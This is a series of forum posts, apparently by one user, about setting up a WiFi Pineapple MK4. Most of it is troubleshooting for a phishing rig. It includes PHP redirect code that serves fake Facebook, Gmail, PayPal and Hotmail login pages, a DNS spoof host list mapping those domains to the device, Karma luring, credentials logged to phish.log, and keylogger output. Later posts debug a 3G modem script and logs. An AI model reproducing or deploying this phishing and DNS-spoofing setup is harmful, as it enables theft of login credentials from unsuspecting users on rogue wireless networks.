Deathstormer

As you mentioned, the key issue with this idea is that websites will go out of date, which will make it easy for the end user to tell somethings up, social networking sites,news sites this sort of thing wouldn't work for. Also i'm not sure what the point behind this would really be?

This would be pretty useful, cant wait to see it.

<?php $ref = $_SERVER['HTTP_HOST']; if (strpos($ref, 'facebook') !== FALSE) include("facebook.htm"); elseif (strpos($ref, 'gmail') !== FALSE) include("gmail.htm"); elseif (strpos($ref, 'paypal') !== FALSE) include("paypal.htm"); elseif (strpos($ref, 'hotmail') !== FALSE) include("hotmail.htm"); require('error.php'); ?> if you put the above code into your index.php it works just fine. facebook.com shows as facebook.com etc.

Another Stupid question. I've got facebook.html,twitter.html,gmail.html all in /www How do i make it so when browsing to facebook.com, it displays as facebook.com not facebook.com/facebook.html, i know this is possible for a single site if renaming to index.php etc. But how do you manage this with multiple files as they cannot have the same name, without being in subfolders which again would make the url look very suspect. Any Ideas?

Got it working. Had to change my redirect.php to the following. <?php $ref = $_SERVER['HTTP_HOST']; if (strpos($ref, 'facebook') !== FALSE){ header('Location: facebook.htm') ;} if (strpos($ref, 'gmail') !== FALSE){ header('Location: gmail.htm') ;} if (strpos($ref, 'paypal') !== FALSE){ header('Location: paypal.htm') ;} if (strpos($ref, 'hotmail') !== FALSE){ header('Location: hotmail.htm') ;} require('error.php'); ?>

Yeah i was just messing around with the code. so this is what my current redirect.php is. <?php $ref = $_SERVER['HTTP_REFERER']; if (strpos($ref, "facebook")) { header('Location: facebook.html') ;} if (strpos($ref, "twitter")) { header('Location: twitter.html') ;} require('error.php'); ?>

If i edit the redirect.php to say. <?php include("facebook.htm"); ?> When i browse to facebook.com it'll redirect me to facebook.com/redirect.php which opens up the facebook.htm file. so it almost looks like there is something wrong with the original code in redirect.php? <?php $ref = $_SERVER['HTTP_REFERER']; if (strpos($ref, "facebook")) { header('Location: facebook.htm') ;} if (strpos($ref, "twitter")) { header('Location: twitter.html') ;} require('error.php'); ?>

Starting to feel very noobish, havnt been able to solve this yet, all my files are in /www directly, i tried editing the landing page,redirect.php as you suggested that just seem to put it into a loop. seems odd i'm the only one having this issue?

Still no Luck. All files are located in /www changing permission on redirect.php didnt seem to help, chmod 777 redirect.php. changing the landing page works - now when i go to facebook.com i get my custom landing page. So it still looks like the landing page is having an issue loading the redirect.php.

Anyone? I'm running the latest FW: 1.1.1 Redirect.php seems to fail. - already tried changing HTTP_REFERER to HTTP_HOST in redirect.php - ping -a 172.16.42.1 resolves to hostnames in the DNS Spoof Host file - ping facebook.com resolves to the real ip of facebook. - going to facebook/paypal/gmail.com in IE,Firefox,Chrome all results in hostname.com/redirect.php and gets stuck there. - if i manually goto 172.16.42.1/facebook.htm i'm able to get the page up fine, creds pass through to phish.log just fine. - have tried to turn dns spoof on/off, power cycle mk4. Any Ideas?

Total Noob question So i've got DNS Spoof enabled on my MK4. So i enable Karma, connect to a network, attempt to goto facebook.com, then spend the next 10mins or so waiting for facebook.com/redirect.php to load. Any one else had this issues with redirect taking a long time to execute? redirect.php code Below DNS Spoof Host Config Below <?php $ref = $_SERVER['HTTP_REFERER']; if (strpos($ref, "facebook")) { header('Location: facebook.html'); } if (strpos($ref, "gmail")) { header('Location: gmail.html'); } if (strpos($ref, "hotmail")) { header('Location: hotmail.html'); } if (strpos($ref, "paypal")) { header('Location: paypal.html'); } require('error.php'); ?> 172.16.42.1 facebook.com 172.16.42.1 www.facebook.com 172.16.42.1 gmail.com 172.16.42.1 www.gmail.com 172.16.42.1 www.hotmail.com 172.16.42.1 hotmail.com 172.16.42.1 www.paypal.com 172.16.42.1 paypal.com

Has anyone else had an issue with this not logging all keys entered? I.E with the gmail template, i enter Bill as the username, Smith as the Password. all i see in the Keylogger interface is. * gmail * Keys > mih -which should really be Smith. Any Ideas?

Nevermind, Updated firmware and now seems to be working, also getting alot better pings.

1.0.2 Since i posted the previous post i was able to ping 8.8.8.8 fine, however writing this post i'm not able to ping any address again. However i still have a 3G IP. i've got 3G bootup enabled and 3G redial enabled. Theres nothing in the logs after the initial 3G connection.

Still no luck with getting my 3G to work. 3G script below makes a successful connection, i get an IP, however i'm unable to ping anything i.e 8.8.8.8 Log Below. Jan 1 00:01:15 Pineapple user.notice root: 3G: Connection Script here, searching for modems Jan 1 00:01:27 Pineapple kern.info kernel: [ 87.810000] usbcore: deregistering interface driver usbserial_generic Jan 1 00:01:27 Pineapple kern.info kernel: [ 87.820000] USB Serial deregistering driver generic Jan 1 00:01:27 Pineapple kern.info kernel: [ 87.820000] usbcore: deregistering interface driver usbserial Jan 1 00:01:30 Pineapple kern.info kernel: [ 90.920000] usbcore: registered new interface driver usbserial Jan 1 00:01:30 Pineapple kern.info kernel: [ 90.930000] USB Serial support registered for generic Jan 1 00:01:30 Pineapple kern.info kernel: [ 90.930000] usbserial_generic 1-1:1.0: generic converter detected Jan 1 00:01:30 Pineapple kern.info kernel: [ 90.940000] usb 1-1: generic converter now attached to ttyUSB0 Jan 1 00:01:30 Pineapple kern.info kernel: [ 90.940000] usbserial_generic 1-1:1.1: generic converter detected Jan 1 00:01:30 Pineapple kern.info kernel: [ 90.950000] usb 1-1: generic converter now attached to ttyUSB1 Jan 1 00:01:30 Pineapple kern.info kernel: [ 90.960000] usbserial_generic 1-1:1.2: generic converter detected Jan 1 00:01:30 Pineapple kern.info kernel: [ 90.960000] usb 1-1: generic converter now attached to ttyUSB2 Jan 1 00:01:30 Pineapple kern.info kernel: [ 90.970000] usbcore: registered new interface driver usbserial_generic Jan 1 00:01:30 Pineapple kern.info kernel: [ 90.970000] usbserial: USB Serial Driver core Jan 1 00:01:31 Pineapple user.notice 3g-hotplug: Starting interface wan2 for device ttyUSB0 Jan 1 00:01:34 Pineapple daemon.notice pppd[2748]: pppd 2.4.5 started by root, uid 0 Jan 1 00:01:35 Pineapple local2.info chat[2756]: abort on (BUSY) Jan 1 00:01:35 Pineapple local2.info chat[2756]: abort on (NO CARRIER) Jan 1 00:01:35 Pineapple local2.info chat[2756]: abort on (ERROR) Jan 1 00:01:35 Pineapple local2.info chat[2756]: report (CONNECT) Jan 1 00:01:35 Pineapple local2.info chat[2756]: timeout set to 10 seconds Jan 1 00:01:35 Pineapple local2.info chat[2756]: send (AT&F^M) Jan 1 00:01:35 Pineapple local2.info chat[2756]: expect (OK) Jan 1 00:01:35 Pineapple local2.info chat[2756]: AT&F^M^M Jan 1 00:01:35 Pineapple local2.info chat[2756]: OK Jan 1 00:01:35 Pineapple local2.info chat[2756]: -- got it Jan 1 00:01:35 Pineapple local2.info chat[2756]: send (ATE1^M) Jan 1 00:01:35 Pineapple local2.info chat[2756]: expect (OK) Jan 1 00:01:35 Pineapple local2.info chat[2756]: ^M Jan 1 00:01:35 Pineapple user.notice root: 3G: firewall stopped Jan 1 00:01:36 Pineapple local2.info chat[2756]: ATE1^M^M Jan 1 00:01:36 Pineapple local2.info chat[2756]: OK Jan 1 00:01:36 Pineapple local2.info chat[2756]: -- got it Jan 1 00:01:36 Pineapple local2.info chat[2756]: send (AT+CGDCONT=1,"IP","live.vodafone.com"^M) Jan 1 00:01:36 Pineapple local2.info chat[2756]: timeout set to 30 seconds Jan 1 00:01:36 Pineapple local2.info chat[2756]: expect (OK) Jan 1 00:01:36 Pineapple local2.info chat[2756]: ^M Jan 1 00:01:36 Pineapple local2.info chat[2756]: AT+CGDCONT=1,"IP","live.vodafone.com"^M^M Jan 1 00:01:36 Pineapple local2.info chat[2756]: OK Jan 1 00:01:36 Pineapple local2.info chat[2756]: -- got it Jan 1 00:01:36 Pineapple local2.info chat[2756]: send (ATD*99***1#^M) Jan 1 00:01:36 Pineapple local2.info chat[2756]: expect (CONNECT) Jan 1 00:01:36 Pineapple local2.info chat[2756]: ^M Jan 1 00:01:36 Pineapple local2.info chat[2756]: ATD*99***1#^M^M Jan 1 00:01:36 Pineapple local2.info chat[2756]: CONNECT Jan 1 00:01:36 Pineapple local2.info chat[2756]: -- got it Jan 1 00:01:36 Pineapple local2.info chat[2756]: send ( ^M) Jan 1 00:01:36 Pineapple daemon.info pppd[2748]: Serial connection established. Jan 1 00:01:36 Pineapple daemon.info pppd[2748]: Using interface 3g-wan2 Jan 1 00:01:36 Pineapple daemon.notice pppd[2748]: Connect: 3g-wan2 <--> /dev/ttyUSB0 Jan 1 00:01:50 Pineapple daemon.warn pppd[2748]: Could not determine remote IP address: defaulting to 10.64.64.64 Jan 1 00:01:50 Pineapple daemon.notice pppd[2748]: replacing old default route to br-lan [172.16.42.42] Jan 1 00:01:50 Pineapple daemon.notice pppd[2748]: local IP address 10.31.148.93 Jan 1 00:01:50 Pineapple daemon.notice pppd[2748]: remote IP address 10.64.64.64 Jan 1 00:01:50 Pineapple daemon.notice pppd[2748]: primary DNS address 10.143.147.147 Jan 1 00:01:50 Pineapple daemon.notice pppd[2748]: secondary DNS address 10.143.147.148 Jan 1 00:01:51 Pineapple user.notice ifup: Enabling Router Solicitations on wan2 (3g-wan2) Jan 1 00:01:51 Pineapple user.info autossh[2964]: starting ssh (count 1) Jan 1 00:01:51 Pineapple user.info autossh[2964]: ssh child pid is 2965 Jan 1 00:01:51 Pineapple user.err autossh[2964]: ssh exited prematurely with status 1; autossh exiting Jan 1 00:02:04 Pineapple authpriv.info dropbear[2966]: Child connection from 172.16.42.168:63392 Jan 1 00:02:13 Pineapple authpriv.notice dropbear[2966]: Password auth succeeded for 'root' from 172.16.42.168:63392 Jan 1 00:02:14 Pineapple daemon.info dnsmasq[1737]: reading /tmp/resolv.conf.auto Jan 1 00:02:14 Pineapple daemon.info dnsmasq[1737]: using nameserver 10.143.147.148#53 Jan 1 00:02:14 Pineapple daemon.info dnsmasq[1737]: using nameserver 10.143.147.147#53 Jan 1 00:02:14 Pineapple daemon.info dnsmasq[1737]: using nameserver 8.8.8.8#53 Jan 1 00:02:14 Pineapple daemon.info dnsmasq[1737]: using local addresses only for domain lan 3G Script Below #!/bin/sh # --------------------------------------------------------- # 3G Connection Script for WiFi Pineapple. "Does the thing" # # Version: 2012-02-17 # Supports: # # ZTE MF591 (T-Mobile) -dkitchen # Novatel MC760 (Virgin) -dkitchen # Novatel MC760 (Ting) -dkitchen # # Updated: wifipineapple.com # --------------------------------------------------------- # ----------------------------------------------------------- # Configure /etc/ppp/options with hard-coded working settings # ----------------------------------------------------------- echo " logfile /dev/null noaccomp nopcomp nocrtscts lock maxfail 0" > /etc/ppp/options # -------------------------------------------------------------------------------------------------- # Check for known usb modem vendor and product IDs then switch 'em from storage to serial modem mode # -------------------------------------------------------------------------------------------------- echo "Searching for attached 3G Modems" logger "3G: Connection Script here, searching for modems" MODEM=$(lsusb | awk '{ print $6 }') echo $MODEM case "$MODEM" in *12d1:1001*) echo "Huawei E173 detected. Attempting mode switch" uci delete network.wan2 uci set network.wan2=interface uci set network.wan2.ifname=ppp0 uci set network.wan2.proto=3g uci set network.wan2.service=umts uci set network.wan2.device=/dev/ttyUSB0 uci set network.wan2.apn=live.vodafone.com uci set network.wan2.username= uci set network.wan2.password= uci set network.wan2.defaultroute=1 uci commit network usb_modeswitch -v 12d1 -p 1001 sleep 10; rmmod usbserial sleep 3; insmod usbserial vendor=0x12d1 product=0x1001 sleep 5; /etc/init.d/firewall disable; /etc/init.d/firewall stop logger "3G: firewall stopped" iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o 3g-wan2 -j MASQUERADE iptables -A FORWARD -s 172.16.42.0/24 -o 3g-wan2 -j ACCEPT iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i 3g-wan2 -j ACCEPT ;; *19d2:1523*) echo "ZTE MF591 (T-Mobile) detected. Attempting mode switch" uci delete network.wan2 uci set network.wan2=interface uci set network.wan2.ifname=ppp0 uci set network.wan2.proto=3g uci set network.wan2.service=umts uci set network.wan2.device=/dev/ttyUSB0 uci set network.wan2.apn=epc.tmobile.com uci set network.wan2.username=internet uci set network.wan2.password=internet uci set network.wan2.defaultroute=1 uci commit network usb_modeswitch -v 19d2 -p 1523 -V 19d2 -P 1525 -M 5553424312345678000000000000061b000000020000000000000000000000 -n 1 -s 20 sleep 10; rmmod usbserial sleep 3; insmod usbserial vendor=0x19d2 product=0x1525 sleep 5; /etc/init.d/firewall disable; /etc/init.d/firewall stop logger "3G: firewall stopped" iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o 3g-wan2 -j MASQUERADE iptables -A FORWARD -s 172.16.42.0/24 -o 3g-wan2 -j ACCEPT iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i 3g-wan2 -j ACCEPT ;; *1410:5031*) echo "Novatel MC760 (Virgin Mobile) detected. Attempting mode switch" uci delete network.wan2 uci set network.wan2=interface uci set network.wan2.ifname=ppp0 uci set network.wan2.proto=3g uci set network.wan2.service=cdma uci set network.wan2.device=/dev/ttyUSB0 uci set network.wan2.username=internet uci set network.wan2.password=internet uci set network.wan2.defaultroute=1 uci set network.wan2.ppp_redial=persist uci set network.wan2.peerdns=0 uci set network.wan2.dns=8.8.8.8 uci set network.wan2.keepalive=1 uci set network.wan2.pppd_options=debug uci set network.wan2.pppd_options=noauth uci commit network usb_modeswitch -v 1410 -p 5031 -V 1410 -P 6002 -M 5553424312345678000000000000061b000000020000000000000000000000 -n 1 -s 20 sleep 10; rmmod usbserial sleep 3; insmod usbserial vendor=-x1410 product=0x6002 sleep 5; /etc/init.d/firewall disable; /etc/init.d/firewall stop logger "3G: firewall stopped" iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o 3g-wan2 -j MASQUERADE iptables -A FORWARD -s 172.16.42.0/24 -o 3g-wan2 -j ACCEPT iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i 3g-wan2 -j ACCEPT ;; *1410:5030*) echo "Novatel MC760 (Ting) detected. Attempting mode switch" uci delete network.wan2 uci set network.wan2=interface uci set network.wan2.ifname=ppp0 uci set network.wan2.proto=3g uci set network.wan2.service=cdma uci set network.wan2.device=/dev/ttyUSB0 uci set network.wan2.username=internet uci set network.wan2.password=internet uci set network.wan2.defaultroute=1 uci set network.wan2.ppp_redial=persist uci set network.wan2.peerdns=0 uci set network.wan2.dns=8.8.8.8 uci set network.wan2.keepalive=1 uci set network.wan2.pppd_options=debug uci set network.wan2.pppd_options=noauth uci commit network usb_modeswitch -v 1410 -p 5030 -V 1410 -P 6000 -M 5553424312345678000000000000061b000000020000000000000000000000 -n 1 -s 20 sleep 10; rmmod usbserial sleep 3; insmod usbserial vendor=0x1410 product=0x6000 sleep 5; /etc/init.d/firewall disable; /etc/init.d/firewall stop logger "3G: firewall stopped" iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o 3g-wan2 -j MASQUERADE iptables -A FORWARD -s 172.16.42.0/24 -o 3g-wan2 -j ACCEPT iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i 3g-wan2 -j ACCEPT ;; esac Any Ideas, it almost seems like the firewall is blocking it somehow..?